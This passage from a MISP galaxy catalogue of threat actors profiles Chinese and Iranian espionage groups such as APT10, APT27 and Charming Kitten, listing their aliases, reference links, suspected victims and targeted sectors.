cfr-suspected-victims | ['Japan', 'Philippines', 'Hong Kong', 'Indonesia', 'Taiwan', 'Vietnam'] |
cfr-target-category | ['Military', 'Government'] |
cfr-type-of-incident | Espionage |
country | CN |
targeted-sector | ['Military', 'Government, Administration'] |
Related clusters
To see the related clusters, click here.
HURRICANE PANDA
CrowdStrike described HURRICANE PANDA as: 'We have investigated their intrusions since 2013 and have been battling them nonstop over the last year at several large telecommunications and technology companies. The determination of this China-based adversary is truly impressive: they are like a dog with a bone. HURRICANE PANDA's preferred initial vector of compromise and persistence is a China Chopper webshell – a tiny and easily obfuscated 70 byte text file that consists of an ‘eval()’ command, which is then used to provide full command execution and file upload/download capabilities to the attackers. This script is typically uploaded to a web server via a SQL injection or WebDAV vulnerability, which is often trivial to uncover in a company with a large external web presence. Once inside, the adversary immediately moves on to execution of a credential theft tool such as Mimikatz (repacked to avoid AV detection). If they are lucky enough to have caught an administrator who might be logged into that web server at the time, they will have gained domain administrator credentials and can now roam your network at will via ‘net use’ and ‘wmic’ commands executed through the webshell terminal.'
Internal MISP references
UUID 0286e80e-b0ed-464f-ad62-beec8536d0cb
which can be used as unique global reference for HURRICANE PANDA
in MISP communities and other software using the MISP galaxy
External references
- http://www.crowdstrike.com/blog/cyber-deterrence-in-action-a-story-of-one-long-hurricane-panda-campaign/ - webarchive
- https://www.crowdstrike.com/blog/crowdstrike-discovers-use-64-bit-zero-day-privilege-escalation-exploit-cve-2014-4113-hurricane-panda/ - webarchive
- https://www.crowdstrike.com/blog/storm-chasing/ - webarchive
- https://www.crowdstrike.com/blog/cyber-deterrence-in-action-a-story-of-one-long-hurricane-panda-campaign/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
attribution-confidence | 50 |
country | CN |
targeted-sector | ['Technology', 'Telecoms'] |
APT27
A China-based actor that targets foreign embassies to collect data on government, defence, and technology sectors.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular APT27.
Known Synonyms |
---|
BRONZE UNION |
Budworm |
EMISSARY PANDA |
Earth Smilodon |
G0027 |
GreedyTaotie |
Group 35 |
Iron Taurus |
Iron Tiger |
Lucky Mouse |
Red Phoenix |
TEMP.Hippo |
TG-3390 |
ZipToken |
Internal MISP references
UUID 834e0acd-d92a-4e38-bb14-dc4159d7cb32
which can be used as unique global reference for APT27
in MISP communities and other software using the MISP galaxy
External references
- https://i.blackhat.com/Asia-22/Friday-Materials/AS-22-Li-To-Loot-Or-Not-To-Loot-That-Is-Not-a-Question.pdf - webarchive
- https://web.archive.org/web/20140129192702/https://www.scmagazineuk.com/iran-and-russia-blamed-for-state-sponsored-espionage/article/330401/ - webarchive
- https://labs.bitdefender.com/2018/02/operation-pzchao-a-possible-return-of-the-iron-tiger-apt/ - webarchive
- https://www.bitdefender.com/files/News/CaseStudies/study/185/Bitdefender-Business-2017-WhitePaper-PZCHAO-crea2452-en-EN-GenericUse.pdf - webarchive
- https://www.cfr.org/interactive/cyber-operations/iron-tiger - webarchive
- https://www.bleepingcomputer.com/news/security/chinese-cyber-espionage-group-hacked-government-data-center/ - webarchive
- https://www.secureworks.com/research/bronze-union - webarchive
- http://newsroom.trendmicro.com/blog/operation-iron-tiger-attackers-shift-east-asia-united-states - webarchive
- https://www.secureworks.com/research/threat-group-3390-targets-organizations-for-cyberespionage - webarchive
- https://www.threatconnect.com/blog/threatconnect-discovers-chinese-apt-activity-in-europe/ - webarchive
- https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/april/decoding-network-data-from-a-gh0st-rat-variant/ - webarchive
- https://securelist.com/luckymouse-ndisproxy-driver/87914/ - webarchive
- https://paper.seebug.org/papers/APT/APT_CyberCriminal_Campagin/2015/2015.09.17.Operation_Iron_Tiger/Operation%20Iron%20Tiger%20Appendix.pdf - webarchive
- https://arstechnica.com/information-technology/2015/08/newly-discovered-chinese-hacking-group-hacked-100-websites-to-use-as-watering-holes/ - webarchive
- https://securelist.com/luckymouse-hits-national-data-center/86083/ - webarchive
- https://attack.mitre.org/groups/G0027/ - webarchive
- https://www.secureworks.com/research/threat-profiles/bronze-union - webarchive
- https://unit42.paloaltonetworks.com/atoms/iron-taurus/ - webarchive
- https://www.mandiant.com/resources/insights/apt-groups - webarchive
- https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf - webarchive
- https://www.welivesecurity.com/2021/03/10/exchange-servers-under-siege-10-apt-groups/ - webarchive
- https://www.trendmicro.com/en_us/research/21/d/iron-tiger-apt-updates-toolkit-with-evolved-sysupdate-malware-va.html - webarchive
Associated metadata
Metadata key | Value |
---|---|
attribution-confidence | 50 |
cfr-suspected-state-sponsor | Unknown |
cfr-suspected-victims | ['United States', 'United Kingdom', 'France', 'Japan', 'Taiwan', 'India', 'Canada', 'China', 'Thailand', 'Israel', 'Australia', 'Republic of Korea', 'Russia', 'Iran', 'Turkey'] |
cfr-target-category | ['Government', 'Private sector'] |
cfr-type-of-incident | Espionage |
country | CN |
targeted-sector | ['Technology', 'Government, Administration', 'Defense'] |
APT10
menuPass is a threat group that has been active since at least 2006. Individual members of menuPass are known to have acted in association with the Chinese Ministry of State Security's (MSS) Tianjin State Security Bureau and worked for the Huaying Haitai Science and Technology Development Company.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular APT10.
Known Synonyms |
---|
ATK41 |
BRONZE RIVERSIDE |
CVNX |
Cloud Hopper |
G0045 |
Granite Taurus |
HOGFISH |
Menupass Team |
POTASSIUM |
Red Apollo |
STONE PANDA |
TA429 |
happyyongzi |
Internal MISP references
UUID 56b37b05-72e7-4a89-ba8a-61ce45269a8c
which can be used as unique global reference for APT10
in MISP communities and other software using the MISP galaxy
External references
- https://unit42.paloaltonetworks.com/unit42-menupass-returns-new-malware-new-attacks-japanese-academics-organizations/ - webarchive
- https://www.cfr.org/interactive/cyber-operations/apt-10 - webarchive
- https://www.ncsc.gov.uk/content/files/protected_files/article_files/Joint%20report%20on%20publicly%20available%20hacking%20tools%20%28NCSC%29.pdf - webarchive
- https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-report-final-v4.pdf - webarchive
- https://www.fireeye.com/blog/threat-research/2017/04/apt10_menupass_grou.html - webarchive
- https://www.eweek.com/security/chinese-nation-state-hackers-target-u.s-in-operation-tradesecret - webarchive
- https://blog.trendmicro.com/trendlabs-security-intelligence/chessmaster-cyber-espionage-campaign/ - webarchive
- https://www.accenture.com/t20180423T055005Z_w_/se-en/_acnmedia/PDF-76/Accenture-Hogfish-Threat-Analysis.pdf - webarchive
- https://www.us-cert.gov/sites/default/files/publications/IR-ALERT-MED-17-093-01C-Intrusions_Affecting_Multiple_Victims_Across_Multiple_Sectors.pdf - webarchive
- https://www.fireeye.com/blog/threat-research/2018/09/apt10-targeting-japanese-corporations-using-updated-ttps.html - webarchive
- https://www.fbi.gov/news/stories/chinese-hackers-indicted-122018 - webarchive
- https://attack.mitre.org/groups/G0045/ - webarchive
- https://www.secureworks.com/research/threat-profiles/bronze-riverside - webarchive
- https://unit42.paloaltonetworks.com/atoms/granite-taurus - webarchive
- https://www.mandiant.com/resources/insights/apt-groups - webarchive
- https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf - webarchive
- https://www.fireeye.com/content/dam/fireeye-www/summit/cds-2019/presentations/cds19-executive-s08-achievement-unlocked.pdf - webarchive
- https://www.proofpoint.com/us/blog/threat-insight/ta410-group-behind-lookback-attacks-against-us-utilities-sector-returns-new - webarchive
- https://www.crowdstrike.com/blog/two-birds-one-stone-panda/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
attribution-confidence | 50 |
cfr-suspected-state-sponsor | China |
cfr-suspected-victims | ['Japan', 'India', 'South Africa', 'South Korea', 'Sweden', 'United States', 'Canada', 'Australia', 'France', 'Finland', 'United Kingdom', 'Brazil', 'Thailand', 'Switzerland', 'Norway'] |
cfr-target-category | ['Private sector', 'Government'] |
cfr-type-of-incident | Espionage |
country | CN |
Hellsing
This threat actor uses spear-phishing techniques to compromise diplomatic targets in Southeast Asia, India, and the United States. It also seems to have targeted APT 30. It possibly uses the same infrastructure as Mirage.
Internal MISP references
UUID af482dde-9e47-48d5-9cb2-cf8f6d6303d3
which can be used as unique global reference for Hellsing
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
attribution-confidence | 50 |
cfr-suspected-state-sponsor | China |
cfr-suspected-victims | ['Malaysia', 'Indonesia', 'Philippines', 'United States', 'India'] |
cfr-target-category | ['Government'] |
cfr-type-of-incident | Espionage |
country | CN |
targeted-sector | ['Infrastructure', 'Diplomacy'] |
Night Dragon
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Night Dragon.
Known Synonyms |
---|
G0014 |
Internal MISP references
UUID b3714d59-b61e-4713-903a-9b4f04ae7f3d
which can be used as unique global reference for Night Dragon
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
attribution-confidence | 50 |
country | CN |
APT15
This threat actor uses phishing techniques to compromise the networks of foreign ministries of European countries for espionage purposes.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular APT15.
Known Synonyms |
---|
BRONZE DAVENPORT |
BRONZE IDLEWOOD |
BRONZE PALACE |
G0004 |
Ke3Chang |
Lurid |
Metushy |
Mirage |
NICKEL |
Nylon Typhoon |
Playful Dragon |
Red Vulture |
Royal APT |
Social Network Team |
VIXEN PANDA |
Internal MISP references
UUID 3501fbf2-098f-47e7-be6a-6b0ff5742ce8
which can be used as unique global reference for APT15
in MISP communities and other software using the MISP galaxy
External references
- https://www.fireeye.com/blog/threat-research/2014/09/forced-to-adapt-xslcmd-backdoor-now-on-os-x.html - webarchive
- http://arstechnica.com/security/2015/04/elite-cyber-crime-group-strikes-back-after-attack-by-rival-apt-gang/ - webarchive
- https://github.com/nccgroup/Royal_APT - webarchive
- https://www.cfr.org/interactive/cyber-operations/mirage - webarchive
- https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/wp-operation-ke3chang.pdf - webarchive
- https://unit42.paloaltonetworks.com/operation-ke3chang-resurfaces-with-new-tidepool-malware/ - webarchive
- https://research.nccgroup.com/2018/03/10/apt15-is-alive-and-strong-an-analysis-of-royalcli-and-royaldns/ - webarchive
- https://www.intezer.com/miragefox-apt15-resurfaces-with-new-tools-based-on-old-ones/ - webarchive
- https://attack.mitre.org/groups/G0004/ - webarchive
- https://www.secureworks.com/research/threat-profiles/bronze-palace - webarchive
- https://www.mandiant.com/resources/insights/apt-groups - webarchive
- https://www.pwc.com/gx/en/issues/cybersecurity/cyber-threat-intelligence/cyber-year-in-retrospect/yir-cyber-threats-report-download.pdf - webarchive
- https://query.prod.cms.rt.microsoft.com/cms/api/am/binary/RWMFIi - webarchive
- https://www.bsi.bund.de/DE/Themen/Unternehmen-und-Organisationen/Cyber-Sicherheitslage/Analysen-und-Prognosen/Threat-Intelligence/Aktive_APT-Gruppen/aktive-apt-gruppen_node.html - webarchive
Associated metadata
Metadata key | Value |
---|---|
attribution-confidence | 50 |
cfr-suspected-state-sponsor | China |
cfr-suspected-victims | ['European Union', 'India', 'United Kingdom', 'Germany'] |
cfr-target-category | ['Government'] |
cfr-type-of-incident | Espionage |
country | CN |
targeted-sector | ['Government, Administration'] |
APT14
PLA Navy Anchor Panda is an adversary that CrowdStrike has tracked extensively over the last year targeting both civilian and military maritime operations in the green/brown water regions primarily in the area of operations of the South Sea Fleet of the PLA Navy. In addition to maritime operations in this region, Anchor Panda also heavily targeted western companies in the US, Germany, Sweden, the UK, and Australia, and other countries involved in maritime satellite systems, aerospace companies, and defense contractors. Not surprisingly, embassies and diplomatic missions in the region, foreign intelligence services, and foreign governments with space programs were also targeted.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular APT14.
Known Synonyms |
---|
ALUMINUM |
ANCHOR PANDA |
QAZTeam |
Internal MISP references
UUID c82c904f-b3b4-40a2-bf0d-008912953104
which can be used as unique global reference for APT14
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
attribution-confidence | 50 |
cfr-suspected-state-sponsor | China |
cfr-suspected-victims | ['United States', 'United Kingdom', 'Germany', 'Australia', 'Sweden'] |
cfr-target-category | ['Government', 'Military'] |
cfr-type-of-incident | Espionage |
country | CN |
motive | Espionage |
targeted-sector | ['Other', 'Aerospace', 'Defense', 'Intelligence', 'Maritime', 'Military', 'Space'] |
APT21
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular APT21.
Known Synonyms |
---|
HAMMER PANDA |
NetTraveler |
TEMP.Zhenbao |
Internal MISP references
UUID b80f4788-ccb2-466d-ae16-b397159d907e
which can be used as unique global reference for APT21
in MISP communities and other software using the MISP galaxy
External references
- https://securelist.com/blog/research/35936/nettraveler-is-running-red-star-apt-attacks-compromise-high-profile-victims/ - webarchive
- https://www.cfr.org/interactive/cyber-operations/nettraveler - webarchive
- https://www.kaspersky.com/about/press-releases/2013_kaspersky-lab-uncovers--operation-nettraveler--a-global-cyberespionage-campaign-targeting-government-affiliated-organizations-and-research-institutes - webarchive
- https://www.kaspersky.com/about/press-releases/2014_nettraveler-gets-a-makeover-for-10th-anniversary - webarchive
- https://unit42.paloaltonetworks.com/nettraveler-spear-phishing-email-targets-diplomat-of-uzbekistan/ - webarchive
- https://www.proofpoint.com/us/threat-insight/post/nettraveler-apt-targets-russian-european-interests - webarchive
- http://www.darkreading.com/endpoint/chinese-cyberspies-pivot-to-russia-in-wake-of-obama-xi-pact/d/d-id/1324242 - webarchive
- https://www.mandiant.com/resources/insights/apt-groups - webarchive
Associated metadata
Metadata key | Value |
---|---|
attribution-confidence | 50 |
cfr-suspected-state-sponsor | China |
cfr-suspected-victims | ['Mongolia', 'Kazakhstan', 'Tajikistan', 'Germany', 'United Kingdom', 'India', 'Kyrgyzstan', 'South Korea', 'United States', 'Chile', 'Russia', 'China', 'Spain', 'Canada', 'Morocco'] |
cfr-target-category | ['Government', 'Military'] |
cfr-type-of-incident | Espionage |
country | CN |
DAGGER PANDA
Operating since at least 2011 from several locations in China, with members in Korea and Japan as well. Possibly linked to Onion Dog. This threat actor targets government institutions, military contractors, maritime and shipbuilding groups, telecommunications operators, and others, primarily in Japan and South Korea.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular DAGGER PANDA.
Known Synonyms |
---|
IceFog |
PLA Unit 69010 |
Red Wendigo |
RedFoxtrot |
Trident |
Internal MISP references
UUID 32c534b9-abec-4823-b223-a810f897b47b
which can be used as unique global reference for DAGGER PANDA
in MISP communities and other software using the MISP galaxy
External references
- https://securelist.com/the-icefog-apt-a-tale-of-cloak-and-three-daggers/57331/ - webarchive
- https://securelist.com/the-icefog-apt-hits-us-targets-with-java-backdoor/58209/ - webarchive
- https://www.cfr.org/interactive/cyber-operations/icefog - webarchive
- https://d2538mqrb7brka.cloudfront.net/wp-content/uploads/sites/43/2018/03/20133739/icefog.pdf - webarchive
- https://www.pwc.com/gx/en/issues/cybersecurity/cyber-threat-intelligence/cyber-year-in-retrospect/yir-cyber-threats-report-download.pdf - webarchive
- https://go.recordedfuture.com/hubfs/reports/cta-2021-0616.pdf - webarchive
Associated metadata
Metadata key | Value |
---|---|
attribution-confidence | 50 |
cfr-suspected-state-sponsor | China |
cfr-suspected-victims | ['South Korea', 'United States', 'Japan', 'Germany', 'China'] |
cfr-target-category | ['Government', 'Military'] |
cfr-type-of-incident | Espionage |
country | CN |
targeted-sector | ['Other', 'Maritime', 'Military', 'Government, Administration', 'Telecoms'] |
APT24
The Pitty Tiger group has been active since at least 2011. They have been seen using the Heartbleed vulnerability to directly obtain valid credentials.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular APT24.
Known Synonyms |
---|
G0011 |
PITTY PANDA |
Temp.Pittytiger |
Internal MISP references
UUID 4d37813c-b8e9-4e58-a758-03168d8aa189
which can be used as unique global reference for APT24
in MISP communities and other software using the MISP galaxy
External references
- http://blog.airbuscybersecurity.com/post/2014/07/The-Eye-of-the-Tiger2 - webarchive
- http://blog.cassidiancybersecurity.com/post/2014/07/The-Eye-of-the-Tiger2 - webarchive
- https://paper.seebug.org/papers/APT/APT_CyberCriminal_Campagin/2014/2014.07.11.Pitty_Tiger/Pitty_Tiger_Final_Report.pdf - webarchive
- https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/targeted-attacks-on-french-company-exploit-multiple-word-vulnerabilities/ - webarchive
- https://www.fireeye.com/blog/threat-research/2014/07/spy-of-the-tiger.html - webarchive
- https://attack.mitre.org/groups/G0011 - webarchive
- https://www.mandiant.com/resources/insights/apt-groups - webarchive
Associated metadata
Metadata key | Value |
---|---|
attribution-confidence | 50 |
country | CN |
Roaming Tiger
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Roaming Tiger.
Known Synonyms |
---|
BRONZE WOODLAND |
Rotten Tomato |
Internal MISP references
UUID 1fb177c1-472a-4147-b7c4-b5269b11703d
which can be used as unique global reference for Roaming Tiger
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Beijing Group
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Beijing Group.
Known Synonyms |
---|
Elderwood |
Elderwood Gang |
G0066 |
SIG22 |
SNEAKY PANDA |
Internal MISP references
UUID da754aeb-a86d-4874-b388-d1d2028a56be
which can be used as unique global reference for Beijing Group
in MISP communities and other software using the MISP galaxy
External references
- https://www.cfr.org/interactive/cyber-operations/sneaky-panda - webarchive
- https://community.broadcom.com/symantecenterprise/communities/community-home/librarydocuments/viewdocument?DocumentKey=3b0d679a-3707-4075-a2a9-37d1af16d411&CommunityKey=1ecf5f55-9545-44d6-b0f4-4e4a7f5f5e68&tab=librarydocuments - webarchive
- https://attack.mitre.org/groups/G0066/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
attribution-confidence | 50 |
cfr-suspected-state-sponsor | China |
cfr-suspected-victims | ['United States', 'Canada', 'United Kingdom', 'Switzerland', 'Hong Kong', 'Australia', 'India', 'Taiwan', 'China', 'Denmark'] |
cfr-target-category | ['Private sector', 'Civil society'] |
cfr-type-of-incident | Espionage |
country | CN |
RADIO PANDA
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular RADIO PANDA.
Known Synonyms |
---|
Shrouded Crossbow |
Internal MISP references
UUID c92d7d31-cfd9-4309-b6c4-b7eb1e85fa7e
which can be used as unique global reference for RADIO PANDA
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
attribution-confidence | 50 |
country | CN |
APT.3102
Internal MISP references
UUID f33fd440-93ee-41e5-974a-be9343e18cdf
which can be used as unique global reference for APT.3102
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
attribution-confidence | 50 |
country | CN |
SAMURAI PANDA
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular SAMURAI PANDA.
Known Synonyms |
---|
PLA Navy |
Wisp Team |
Internal MISP references
UUID 2fb07fa4-0d7f-43c7-8ff4-b28404313fe7
which can be used as unique global reference for SAMURAI PANDA
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
attribution-confidence | 50 |
cfr-suspected-state-sponsor | China |
cfr-suspected-victims | ['United States', 'United Kingdom', 'Hong Kong'] |
cfr-target-category | ['Private sector', 'Military'] |
cfr-type-of-incident | Espionage |
country | CN |
IMPERSONATING PANDA
Internal MISP references
UUID b56ecbda-6b2a-4aa9-b592-d9a0bc810ec1
which can be used as unique global reference for IMPERSONATING PANDA
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
attribution-confidence | 50 |
country | CN |
APT20
We’ve uncovered some new data and likely attribution regarding a series of APT watering hole attacks this past summer. Watering hole attacks are an increasingly popular component of APT campaigns, as many people are more aware of spear phishing and are less likely to open documents or click on links in unsolicited emails. Watering hole attacks offer a much better chance of success because they involve compromising legitimate websites and installing malware intended to compromise website visitors. These are often popular websites frequented by people who work in specific industries or have political sympathies to which the actors want to gain access. In contrast to many other APT campaigns, which tend to rely heavily on spear phishing to gain victims, “th3bug” is known for compromising legitimate websites their intended visitors are likely to frequent. Over the summer they compromised several sites, including a well-known Uyghur website written in that native language.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular APT20.
Known Synonyms |
---|
Crawling Taurus |
TH3Bug |
VIOLIN PANDA |
Internal MISP references
UUID 8bcd855f-a4c1-453a-bede-ff36582f4f40
which can be used as unique global reference for APT20
in MISP communities and other software using the MISP galaxy
External references
- http://researchcenter.paloaltonetworks.com/2014/09/recent-watering-hole-attacks-attributed-apt-group-th3bug-using-poison-ivy/ - webarchive
- https://www.fox-it.com/nl/actueel/whitepapers/operation-wocao-shining-a-light-on-one-of-chinas-hidden-hacking-groups/ - webarchive
- https://paper.seebug.org/papers/APT/APT_CyberCriminal_Campagin/2015/Aug.10.The_Italian_Connection_An_analysis_of_exploit_supply_chains_and_digital_quartermasters/HTExploitTelemetry.pdf - webarchive
- https://unit42.paloaltonetworks.com/atoms/crawling-taurus/ - webarchive
- https://www.mandiant.com/resources/insights/apt-groups - webarchive
Associated metadata
Metadata key | Value |
---|---|
attribution-confidence | 50 |
country | CN |
TOXIC PANDA
A group targeting dissident groups in China and along its borders.
Internal MISP references
UUID 1514546d-f6ea-4af3-bbea-24d6fd9e6761
which can be used as unique global reference for TOXIC PANDA
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
attribution-confidence | 50 |
country | CN |
TEMPER PANDA
A China-based cyber threat group. It has previously used newsworthy events as lures to deliver malware and has primarily targeted organizations involved in financial, economic, and trade policy, typically using publicly available RATs such as PoisonIvy, as well as some non-public backdoors. This threat actor targets pro-democratic activists and organizations in Hong Kong, European and international financial institutions, and a U.S.-based think tank.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular TEMPER PANDA.
Known Synonyms |
---|
Admin338 |
G0018 |
MAGNESIUM |
Team338 |
admin@338 |
Internal MISP references
UUID ac4bce1f-b3ec-4c44-bd36-b6cc986b319b
which can be used as unique global reference for TEMPER PANDA
in MISP communities and other software using the MISP galaxy
External references
- https://www.fireeye.com/blog/threat-research/2013/10/know-your-enemy-tracking-a-rapidly-evolving-apt-actor.html - webarchive
- https://www.fireeye.com/blog/threat-research/2015/11/china-based-threat.html - webarchive
- https://www.cfr.org/interactive/cyber-operations/admin338 - webarchive
- https://attack.mitre.org/groups/G0018/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
attribution-confidence | 50 |
cfr-suspected-state-sponsor | China |
cfr-suspected-victims | ['Hong Kong', 'United States'] |
cfr-target-category | ['Government', 'Private sector', 'Civil society'] |
cfr-type-of-incident | Espionage |
country | CN |
targeted-sector | ['Activists', 'Trade', 'Finance', 'Political party'] |
APT23
TrendMicro described Tropic Trooper in a 2015 report as: 'Taiwan and the Philippines have become the targets of an ongoing campaign called Operation TropicTrooper. Active since 2012, the attackers behind the campaign have set their sights on the Taiwanese government as well as a number of companies in heavy industry. The same campaign has also targeted key Philippine military agencies.'
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular APT23.
Known Synonyms |
---|
BRONZE HOBART |
Earth Centaur |
G0081 |
KeyBoy |
PIRATE PANDA |
Red Orthrus |
Tropic Trooper |
Internal MISP references
UUID 7f16d1f5-04ee-4d99-abf0-87e1f23f9fee
which can be used as unique global reference for APT23
in MISP communities and other software using the MISP galaxy
External references
- https://blog.rapid7.com/2013/06/07/keyboy-targeted-attacks-against-vietnam-and-india/ - webarchive
- http://www.crowdstrike.com/blog/rhetoric-foreshadows-cyber-activity-in-the-south-china-sea/ - webarchive
- https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf - webarchive
- http://researchcenter.paloaltonetworks.com/2016/11/unit42-tropic-trooper-targets-taiwanese-government-and-fossil-fuel-provider-with-poison-ivy/ - webarchive
- http://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papers/wp-operation-tropic-trooper.pdf - webarchive
- https://blog.trendmicro.com/trendlabs-security-intelligence/tropic-trooper-new-strategy/ - webarchive
- https://unit42.paloaltonetworks.com/unit42-tropic-trooper-targets-taiwanese-government-and-fossil-fuel-provider-with-poison-ivy/ - webarchive
- https://blog.lookout.com/titan-mobile-threat - webarchive
- https://attack.mitre.org/groups/G0081/ - webarchive
- https://www.secureworks.com/research/threat-profiles/bronze-hobart - webarchive
- https://www.mandiant.com/resources/insights/apt-groups - webarchive
- https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf - webarchive
- https://www.trendmicro.com/en_us/research/21/l/collecting-in-the-dark-tropic-trooper-targets-transportation-and-government-organizations.html - webarchive
Associated metadata
Metadata key | Value |
---|---|
attribution-confidence | 50 |
country | CN |
targeted-sector | ['Military', 'Government, Administration'] |
Flying Kitten
Activity: targets the defense and aerospace sectors, and is also interested in targeting entities in the oil/gas industry.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Flying Kitten.
Known Synonyms |
---|
Ajax Security Team |
AjaxSecurityTeam |
Group 26 |
Saffron Rose |
SaffronRose |
Sayad |
Internal MISP references
UUID ba724df5-9aa0-45ca-8e0e-7101c208ae48
which can be used as unique global reference for Flying Kitten
in MISP communities and other software using the MISP galaxy
External references
- https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-operation-saffron-rose.pdf - webarchive
- https://www.crowdstrike.com/blog/cat-scratch-fever-crowdstrike-tracks-newly-reported-iranian-actor-flying-kitten/ - webarchive
- https://www.cfr.org/interactive/cyber-operations/saffron-rose - webarchive
Associated metadata
Metadata key | Value |
---|---|
attribution-confidence | 50 |
cfr-suspected-state-sponsor | Iran (Islamic Republic of) |
cfr-suspected-victims | ['United States', 'Iranian internet activists'] |
cfr-target-category | ['Military', 'Civil society'] |
cfr-type-of-incident | Espionage |
country | IR |
targeted-sector | ['Aerospace', 'Defense', 'Gas', 'Oil'] |
Cutting Kitten
One of the threat actors responsible for the denial of service attacks against the U.S. in 2012–2013. Three individuals associated with the group, believed to have been working on behalf of Iran’s Islamic Revolutionary Guard Corps, were indicted by the Justice Department in 2016.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Cutting Kitten.
Known Synonyms |
---|
ITsecTeam |
Internal MISP references
UUID 11e17436-6ede-4733-8547-4ce0254ea19e
which can be used as unique global reference for Cutting Kitten
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
attribution-confidence | 50 |
cfr-suspected-state-sponsor | Iran (Islamic Republic of) |
cfr-suspected-victims | ['United States', 'Bank of America', 'US Bancorp', 'Fifth Third Bank', 'Citigroup', 'PNC', 'BB&T', 'Wells Fargo', 'Capital One', 'HSBC', 'AT&T', 'NYSE'] |
cfr-type-of-incident | ['Denial of service'] |
country | IR |
Charming Kitten
Charming Kitten (aka Parastoo, aka Newscaster) is a group with a suspected nexus to Iran that targets organizations involved in the government, defense technology, military, and diplomacy sectors.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Charming Kitten.
Known Synonyms |
---|
CharmingCypress |
G0058 |
Group 83 |
NewsBeef |
Newscaster |
Parastoo |
iKittens |
Internal MISP references
UUID f98bac6b-12fd-4cad-be84-c84666932232
which can be used as unique global reference for Charming Kitten
in MISP communities and other software using the MISP galaxy
External references
- https://en.wikipedia.org/wiki/Operation_Newscaster - webarchive
- https://iranthreats.github.io/resources/macdownloader-macos-malware/ - webarchive
- https://paper.seebug.org/papers/APT/APT_CyberCriminal_Campagin/2014/2014.05.28.NewsCaster_An_Iranian_Threat_Within_Social_Networks/file-2581720763-pdf.pdf - webarchive
- https://www.forbes.com/sites/thomasbrewster/2017/07/27/iran-hackers-oilrig-use-fake-personas-on-facebook-linkedin-for-cyberespionage/ - webarchive
- https://cryptome.org/2012/11/parastoo-hacks-iaea.htm - webarchive
- https://securelist.com/files/2017/03/Report_Shamoon_StoneDrill_final.pdf - webarchive
- https://securelist.com/blog/software/74503/freezer-paper-around-free-meat/ - webarchive
- https://www.verfassungsschutz.de/download/broschuere-2016-10-bfv-cyber-brief-2016-04.pdf - webarchive
- https://www.cfr.org/interactive/cyber-operations/newscaster - webarchive
- https://www.washingtontimes.com/news/2014/may/29/iranian-hackers-sucker-punch-us-defense-heads-crea/ - webarchive
- https://securelist.com/freezer-paper-around-free-meat/74503/ - webarchive
- https://www.scmagazine.com/home/security-news/cybercrime/hbo-breach-accomplished-with-hard-work-by-hacker-poor-security-practices-by-victim/ - webarchive
- http://www.arabnews.com/node/1195681/media - webarchive
- https://cyware.com/news/iranian-apt-charming-kitten-impersonates-clearsky-the-security-firm-that-uncovered-its-campaigns-7fea0b4f - webarchive
- https://blog.certfa.com/posts/the-return-of-the-charming-kitten/ - webarchive
- https://www.justice.gov/opa/pr/former-us-counterintelligence-agent-charged-espionage-behalf-iran-four-iranians-charged-cyber - webarchive
- https://blogs.microsoft.com/on-the-issues/2019/03/27/new-steps-to-protect-customers-from-hacking/ - webarchive
- https://www.clearskysec.com/wp-content/uploads/2017/12/Charming_Kitten_2017.pdf - webarchive
- https://attack.mitre.org/groups/G0058/ - webarchive
- https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf - webarchive
- https://www.volexity.com/blog/2024/02/13/charmingcypress-innovating-persistence/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
attribution-confidence | 50 |
